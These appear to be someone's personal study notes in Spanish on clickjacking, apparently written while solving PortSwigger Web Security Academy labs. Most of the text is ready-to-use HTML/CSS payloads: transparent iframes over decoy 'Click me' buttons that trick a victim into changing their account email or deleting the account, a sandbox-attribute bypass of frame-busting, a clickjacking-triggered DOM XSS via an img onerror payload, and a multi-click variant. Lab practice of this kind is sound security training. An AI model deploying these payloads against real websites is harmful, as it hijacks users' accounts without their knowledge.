Variando la opacidad, tenemos que hacer que el click me se pose en deleteaccount o lo que queramos

Si queremos cambiar el correo
https://loquesea.es/my-account?email=tehackeo@todoelcorreo.com
al poner eso, el campo se rellena pero no se envía, la víctima al hacer click lo envía
<style>
    iframe {
        position:relative;
        width:1000px;
        height: 700px;
        opacity: 0.0000001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:467px;
        left:75px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0a59003103cfc2688149936500e9004f.web-security-academy.net/my-account?email=tehackeo@todoelcorreo.com"></iframe>


para el buscador de iframes habilitamos <iframe  sandbox="allow-forms allow-scripts  allow-top-navigation"   , si no funciona dejamos allow-forms
<style>
    iframe {
        position:relative;
        width:1000px;
        height: 700px;
        opacity: 0.8;
        z-index: 2;
    }
    div {
        position:absolute;
        top:467px;
        left:75px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe  sandbox="allow-forms" src="https://0a160036039ae38f8199c04700df005d.web-security-academy.net/my-account?email=tehackeo%40odoelcorreo.com"></iframe>

DOM XSS en name, BurpScan no lo detecta
<style>
	iframe {
		position:relative;
		width:1000px;
		height: 700px;
		opacity: 0.0001;
		z-index: 2;
	}
	div {
		position:absolute;
		top:617px;
		left:75px;
		z-index: 1;
	}
</style>
<div>Click Me</div>
<iframe src="https://0a04006204d511b68183b6df00e000fd.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=aaaaef%40asef.com&subject=sdsdg&message=aaaaa#feedbackResult"></iframe>

Cuando haya dos clicks o más
<style>
	iframe {
		position:relative;
		width:1000px;
		height: 700px;
		opacity: 0.8;
		z-index: 2;
	}
   .firstClick, .secondClick {
		position:absolute;
		top:515px;
		left:55px;
		z-index: 1;
	}
   .secondClick {
		top:314px;
		left:211px;
	}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://0acf00930426680580b10d8400420046.web-security-academy.net/my-account"></iframe>